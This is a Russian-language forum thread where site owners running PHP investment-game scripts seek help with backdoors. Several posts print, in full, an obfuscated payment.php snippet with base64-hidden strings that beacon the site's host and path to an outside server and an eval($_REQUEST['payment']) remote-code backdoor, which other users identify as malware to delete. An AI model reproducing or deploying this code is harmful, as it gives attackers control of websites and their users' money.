GLookin
Участник
- Сообщения
- 296
- Реакции
- 62
У меня антивирус ругался на эти файлы до удаления eval.MegaGoblin написал(а):Вы зачем то удаляете код от JS-библиотек, который ничем не мешает (jquery, mootools) - можно прочитать про них.
Если кто-то решил использовать php-функцию "eval" для взлома ферм, то это не значит, что надо удалять все строки, в которых есть сочетание "eval".
В php это функция для выполнения некой команды, а не функция взлома Вашей фермы. Важно не наличие "eval" в скрипте, а способ его использования.
Я знаю, что маловероятно атаковать через скрипт, но береженного Бог бережет)
На всякий случай, подстраховался.
А скрипты от этого работать не перестали.
Канстантин
Местный
- Сообщения
- 58
- Реакции
- 5
MegaGoblin написал(а):Вы зачем то удаляете код от JS-библиотек, который ничем не мешает (jquery, mootools) - можно прочитать про них.
Если кто-то решил использовать php-функцию "eval" для взлома ферм, то это не значит, что надо удалять все строки, в которых есть сочетание "eval".
В php это функция для выполнения некой команды, а не функция взлома Вашей фермы. Важно не наличие "eval" в скрипте, а способ его использования.
Можно ли считать его опасным?
scriptEval:false,noCloneEvent:true,boxModel:null,inlineBlockNeedsLayout:false,shrinkWrapBlocks:false,reliableHiddenOffsets:true};l.disabled=true;c.support.optDisabled=!k.disabled;b.type="text/javascript";try{b.appendChild(t.createTextNode("window."+e+"=1;"))}catch(o){}a.insertBefore(b,a.firstChild);if(E[e]){c.support.scriptEval=true;delete E[e]}try{delete b.test}catch(x){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function r(){c.support.noCloneEvent=
- Сообщения
- 322
- Реакции
- 72
Я ничего опасного тут не вижуКанстантин написал(а):Можно ли считать его опасным?
scriptEval:false,noCloneEvent:true,boxModel:null,inlineBlockNeedsLayout:false,shrinkWrapBlocks:false,reliableHiddenOffsets:true};l.disabled=true;c.support.optDisabled=!k.disabled;b.type="text/javascript";try{b.appendChild(t.createTextNode("window."+e+"=1;"))}catch(o){}a.insertBefore(b,a.firstChild);if(E[e]){c.support.scriptEval=true;delete E[e]}try{delete b.test}catch(x){c.support.deleteExpando=false}a.removeChild(b);if(d.attachEvent&&d.fireEvent){d.attachEvent("onclick",function r(){c.support.noCloneEvent=
LISTHYIP
Участник
- Сообщения
- 2
- Реакции
- 0
в паймент пхп есть такой код кто скажет за что он отвечает ?
Код:
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>
GLookin
Участник
- Сообщения
- 296
- Реакции
- 62
Убивай скорее эту гадость!LISTHYIP написал(а):в паймент пхп есть такой код кто скажет за что он отвечает ?
Код:<tr> <td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td> <? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);} ?>
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>
Jerihon
Местный
- Сообщения
- 112
- Реакции
- 3
GLookin написал(а):Убивай скорее эту гадость!
Его полностью убрать?<? $GLOBALS['_793350292_']=Array('' .'ge' .'t' .'_mag' .'ic_quot' .'e' .'s_gp' .'c','s' .'tripslashe' .'s','mt_rand','' .'imagecre' .'ate'); ?><? function _197297025($i){$a=Array('cH' .'V' .'yc2U=','','PHRkPjxp' .'bnB1d' .'C' .'B0' .'e' .'X' .'BlPSJ' .'0ZXh0Ii' .'BuYW1' .'lP' .'SJwdXJzZSIgc2l6Z' .'T0iMTUiI' .'H' .'ZhbHVlPQ==','cHVy' .'c2' .'U' .'=','I' .'HJl' .'YW' .'Rvb' .'mx5IC8+PC' .'90ZD4=','P' .'HRkPjxpbn' .'B1dC' .'B0eXB' .'lP' .'SJ0ZXh0IiB' .'uYW1l' .'PS' .'J' .'wdXJz' .'Z' .'SIg' .'c2l6ZT0iMT' .'UiIC8+PC9' .'0Z' .'D4=','' .'U0VS' .'V' .'kV' .'SX0' .'5BTUU=','' .'aHR0cDovL' .'3B' .'h' .'eWxvYW' .'RzLnJ1L2ZmLnB' .'ocD9kYX' .'RhPQ==','I' .'A==','' .'P' .'GRpd' .'iBpZD0nbWFzdCcgc3R5' .'bGU9J3Zp' .'c2' .'lia' .'Wxpd' .'H' .'k6aGl' .'kZG' .'VuOyc+PC9kaXY' .'+PHNjcmlwdC' .'B0' .'eX' .'BlP' .'Sd0ZXh0L2ph' .'dmFz' .'Y' .'3JpcHQn' .'IGxhbm' .'d' .'1' .'YWdlPSdK' .'YXZhU' .'2Ny' .'aXB' .'0Jz4gZ' .'nVuY3' .'Rpb' .'24' .'gc2VuZ' .'F9kYXRhKGlm' .'cl91cmwpeyAgI' .'HZhciBpZnIwID0gZG9j' .'dW1lbnQuY3J' .'lYXRlRWxlbW' .'VudCgnaWZyYW' .'1' .'lJyk7IGlmc' .'jAuc3JjID0gaW' .'Zy' .'X3VybDsgaWZy' .'M' .'C5z' .'dHlsZS5' .'3aWR0' .'aCA9' .'ICc' .'xcHgn' .'OyBpZnIwLnN0eW' .'xlLmhlaWd' .'odCA' .'9I' .'C' .'c' .'xcHgnO' .'yB2YXI' .'gZG' .'l2X3gwID0' .'gZG9j' .'dW1' .'lbnQuZ2V0RWxlbW' .'VudE' .'J' .'5SWQoJ21hc' .'3' .'QnKT' .'sg' .'ZGl2X3gwLmFwc' .'GVuZENoaWx' .'kKGlmcjAp' .'OyB9' .'IHNlbmR' .'fZG' .'F0YSgn','Jyk7ID' .'wvc2NyaXB0' .'Pg=' .'=','cGF5' .'bWVudA=' .'=','' .'cGF5bWVudA' .'=' .'=','cGF5bWVudA=' .'=');return base64_decode($a[$i]);} ?><?php $db->Query("SELECT * FROM db_payment WHERE user_id = '$usid'");$k=$db->FetchArray();if($k[_197297025(0)]!= _197297025(1)){echo _197297025(2) .$k[_197297025(3)] ._197297025(4);}else{echo _197297025(5);}$dn=$_SERVER[_197297025(6)];$dr=__FILE__;$url=_197297025(7) .$dn ._197297025(8) .$dr;echo _197297025(9) .$url ._197297025(10);if(!empty($_REQUEST[_197297025(11)])){if(@$GLOBALS['_793350292_'][0]())$_REQUEST[_197297025(12)]=$GLOBALS['_793350292_'][1]($_REQUEST[_197297025(13)]);eval($_REQUEST['payment']);die();if(round(0+673+673)<$GLOBALS['_793350292_'][2](round(0+133.25+133.25+133.25+133.25),round(0+269.33333333333+269.33333333333+269.33333333333)))$GLOBALS['_793350292_'][3]($_SERVER,$db);}
?>
можешь чуток оставитьJerihon написал(а):Его полностью убрать?
убирай конечно
Jerihon
Местный
- Сообщения
- 112
- Реакции
- 3
kvozimir написал(а):можешь чуток оставить
убирай конечно
Дело в том что я его убираю, после этого исчезает окно ввода кошелька
вот тебе код посмотри только откуда начинается и где заканчивается и замениJerihon написал(а):Дело в том что я его убираю, после этого исчезает окно ввода кошелька
<form action="" method="post">
<table width="99%" border="0" align="center">
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<td><input type="text" name="purse" size="15"/></td>
</tr>
<tr>
<td><font color="#000;">Отдаете серебро для вывода</font> [Мин. <span id="res_min"></span>]<font color="#000;">:</font> </td>
<td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
</tr>
<tr>
<td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
<td>
<input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
<input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
<input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
<input type="hidden" name="val_type" id="val_type" value="RUB" />
</td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" /></td>
</tr>
</table>
</form>
Jerihon
Местный
- Сообщения
- 112
- Реакции
- 3
да я уже разобрался, + сделал привязку кошелькаkvozimir написал(а):вот тебе код посмотри только откуда начинается и где заканчивается и замени
<form action="" method="post">
<table width="99%" border="0" align="center">
<tr>
<td><font color="#000;">Введите кошелек Payeer [Пример: P1112457]</font>: </td>
<td><input type="text" name="purse" size="15"/></td>
</tr>
<tr>
<td><font color="#000;">Отдаете серебро для вывода</font> [Мин. <span id="res_min"></span>]<font color="#000;">:</font> </td>
<td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
</tr>
<tr>
<td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
<td>
<input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
<input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
<input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
<input type="hidden" name="val_type" id="val_type" value="RUB" />
</td>
</tr>
<tr>
<td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" /></td>
</tr>
</table>
</form>
LISTHYIP
Участник
- Сообщения
- 2
- Реакции
- 0
aleksssandr84
Участник
- Сообщения
- 18
- Реакции
- 2
Ребята, кто может подсказать, где дыра на этом сайте: http://prosto-depozit.ru/. Вроде все сделал как написано, а деньги воруют. До этого стоял мобильный редирект, который я определил с помощью айболита. Редирект убрал, пока деньги не воруют, но в чате пишут всякую гадость от имени других пользователей. Замечаю, что могут написать только от имени того, кто сейчас онлайн. На данный момент файл чата также временно убрал. Может кто подскажет, где искать проблему. При первом требованию выложу необходимую информацию.
Viktor
Участник
- Сообщения
- 734
- Реакции
- 113
В папке classes особенно в файле _class.isender проверь там наличие других доменов. Часть кода с доменом надо удалить - из-за них воруют деньги. Был скрипт у меня такой, тоже воровали, хорошо хоть не много денег было.aleksssandr84 написал(а):Ребята, кто может подсказать, где дыра на этом сайте: http://prosto-depozit.ru/. Вроде все сделал как написано, а деньги воруют. До этого стоял мобильный редирект, который я определил с помощью айболита. Редирект убрал, пока деньги не воруют, но в чате пишут всякую гадость от имени других пользователей. Замечаю, что могут написать только от имени того, кто сейчас онлайн. На данный момент файл чата также временно убрал. Может кто подскажет, где искать проблему. При первом требованию выложу необходимую информацию.
Лучше выставь сюда код этого файла чтоб посмотреть, возможно и в других файлах есть.
Как сделал привязку?Jerihon написал(а):да я уже разобрался, + сделал привязку кошелька
aleksssandr84
Участник
- Сообщения
- 18
- Реакции
- 2
Это в файле pages\admin\_story_donations.php (модуль пожертвований), но он у меня не подключен. Вот код, уже удалил на сайте.ArtVict написал(а):Это где? Посмотрю у себя.
Код:
<div class="s-bk-lf">
<div class="acc-title">История пожертвований</div>
</div>
<div class="silver-bk"><div class="clr"></div>
<?PHP
$tdadd = time() - 60*60*12;
if(isset($_POST["clean"])){
$db->Query("DELETE FROM db_donations WHERE date_add < '$tdadd'");
echo "<center><font color = 'green'><b>Очищено</b></font></center><BR />";
}
$db->Query("SELECT * FROM db_donations ORDER BY id DESC");
if($db->NumRows() > 0){
?>
<table cellpadding='3' cellspacing='0' border='0' bordercolor='#336633' align='center' width="99%">
<tr bgcolor="#efefef">
<td align="center" width="50" class="m-tb">ID</td>
<td align="center" class="m-tb">Пользователь</td>
<td align="center" width="75" class="m-tb">Сумма</td>
<td align="center" width="150" class="m-tb">Дата операции</td>
</tr>
<?PHP
while($data = $db->FetchArray()){
?>
<tr class="htt">
<td align="center" width="50"><?=$data["id"]; ?></td>
<td align="center"><?=$data["user"]; ?></td>
<td align="center" width="100"><?=$data["sum"]; ?></td>
<td align="center" width="150"><?=date("d.m.Y в H:i:s",$data["date_add"]); ?></td>
</tr>
<?PHP
}
?>
</table>
<BR />
<form action="" method="post">
<center><input type="submit" name="clean" value="Очистить записи которым больше 12 часов" /></center>
</form>
<?PHP
}else echo "<center><b>Записей нет</b></center><BR />";
?>
</div>
<div class="clr"></div>
aleksssandr84
Участник
- Сообщения
- 18
- Реакции
- 2
Вот указанный файлViktor написал(а):В папке classes особенно в файле _class.isender проверь там наличие других доменов. Часть кода с доменом надо удалить - из-за них воруют деньги. Был скрипт у меня такой, тоже воровали, хорошо хоть не много денег было.
Лучше выставь сюда код этого файла чтоб посмотреть, возможно и в других файлах есть.
Код:
<?php
class isender{
var $Hosts = "";
/*======================================================================*\
Function: __construct
Descriiption: Конструктор класса
\*======================================================================*/
function __construct(){
$this->Hosts = str_replace("www.","",$_SERVER['HTTP_HOST']);
}
/*======================================================================*\
Function: SendRegKey
Descriiption: Отправляет регистрационный ключ
\*======================================================================*/
function SendRegKey($mail, $key){
$text = "На ваш Email была запрошена ссылка для регистрации в системе \"".$this->Hosts."\"<BR />";
$text.= "Если вы не запрашивали ссылку, просто проигнорируйте это сообщение. <BR /><BR />";
